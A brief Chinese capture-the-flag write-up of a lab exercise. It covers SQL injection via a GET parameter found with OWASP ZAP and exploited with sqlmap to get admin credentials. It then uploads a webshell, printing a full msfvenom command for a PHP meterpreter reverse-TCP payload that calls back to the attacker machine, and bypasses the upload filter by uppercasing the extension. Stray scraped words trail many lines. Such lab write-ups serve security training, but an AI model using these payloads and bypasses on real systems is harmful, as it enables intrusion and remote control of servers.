CTF—攻防練習之HTTP—SQl注入(get)

攻擊機:192.168.32.152php

靶機 :192.168.32.157web

 

掃描靶機掃端口:sql

開放了ssh和80
看下ssh版本有沒有漏洞,searchsplot下,沒有發現
shell

dirb掃描下目錄,有個admin的打開ssh

進入到一個登陸界面,隨時試了幾個弱口令,不行tcp

用掃描器吧,打開owasp zap掃一下blog

 

 

 

直接掃到了一個注入點  http://192.168.32.157/cat.php?id=3 ,直接sqlmap跑一下
登錄

存在注入,那麼直接,爆庫,爆字段,爆關鍵字,發現了password:map

 

 

登進來了
找到一個上傳點im

再製做一個webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 -f raw 

上傳時發現文件名不能包含php,那就改爲PHP便可

上傳成功後,再用msf監聽端口,拿到shell

相關文章
相關標籤/搜索